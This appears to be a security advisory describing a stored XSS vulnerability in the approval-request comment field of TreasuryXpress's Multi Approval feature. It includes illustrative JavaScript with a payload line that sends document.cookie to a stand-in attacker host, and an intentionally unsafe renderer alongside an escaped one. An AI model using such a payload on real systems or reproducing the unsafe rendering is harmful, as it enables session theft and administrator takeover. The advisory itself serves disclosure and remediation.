TreasuryXpress is a SaaS (Software as a Service) company that offers treasury management and cash forecasting solutions.
The affected component is the application's Multi Approval security feature. This feature restricts lower-privilege users from applying changes to sensitive modules: a change submitted by such a user requires manual approval from one or more administrators before it takes effect.
When submitting an approval request, the user can add a comment to the request. This comment field is vulnerable to stored cross-site scripting (XSS). Because approval requests are reviewed by an administrator, a payload delivered in the comment executes in the administrator's browser session. A low-privilege user can therefore target an administrator directly, which escalates the risk of this vulnerability significantly.
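The following is an added illustration of the bug class described above, not TreasuryXpress's own code and not the payload used in this assessment. It assumes a server-side render step that builds the administrator's approval-queue page from the request object; the field names, the sample comment and the generic script payload are constructed for the example.

```javascript
// Hypothetical illustration of a stored XSS in an approval-request comment
// that is rendered into an administrator's review page. Not TreasuryXpress code.

// Constructed sample comment a low-privilege user might attach to a request.
// The payload is a generic illustration, not the one from the assessment.
const SAMPLE_COMMENT =
  'Please approve <script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Vulnerable rendering: the comment is concatenated straight into the HTML
// that the approving administrator's browser parses, so any markup in it
// becomes live DOM (and executes as script) in the administrator's session.
function renderApprovalUnsafe(request) {
  return '<div class="approval">' +
    '<p>Requested by: ' + request.requester + '</p>' +
    '<p>Comment: ' + request.comment + '</p>' +
    '</div>';
}

// Output encoding for HTML text content and quoted attribute values.
// Ampersand is replaced first so already-encoded entities are not mangled.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: every user-controlled field is encoded at the point it
// is written into HTML, so the comment is displayed verbatim as text rather
// than parsed as markup. The requester field is encoded too: the trust
// boundary is the whole request, not just the comment.
function renderApprovalSafe(request) {
  return '<div class="approval">' +
    '<p>Requested by: ' + escapeHtml(request.requester) + '</p>' +
    '<p>Comment: ' + escapeHtml(request.comment) + '</p>' +
    '</div>';
}

// Crude check used only by this example: does the rendered HTML still
// contain a raw <script> start tag? It is enough to show the difference
// between the two renderers on the constructed input.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration on the constructed request.
const demoRequest = { requester: 'analyst@example.test', comment: SAMPLE_COMMENT };
console.log('unsafe render contains live <script>:', containsScriptTag(renderApprovalUnsafe(demoRequest)));
console.log('safe render contains live <script>:  ', containsScriptTag(renderApprovalSafe(demoRequest)));
```

The encoding shown is correct for HTML text and quoted-attribute contexts only; a comment echoed into a JavaScript string, a URL or an event-handler attribute needs the encoder for that context. A Content Security Policy that disallows inline script is worthwhile defence in depth for an administrator-facing page, but it does not replace output encoding.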
Although TreasuryXpress is primarily a SaaS solution, the TreasuryXpress website lists an on-premise offering as a deployment option. If the affected version were deployed on-premise, the vulnerability could be exploited in the same way.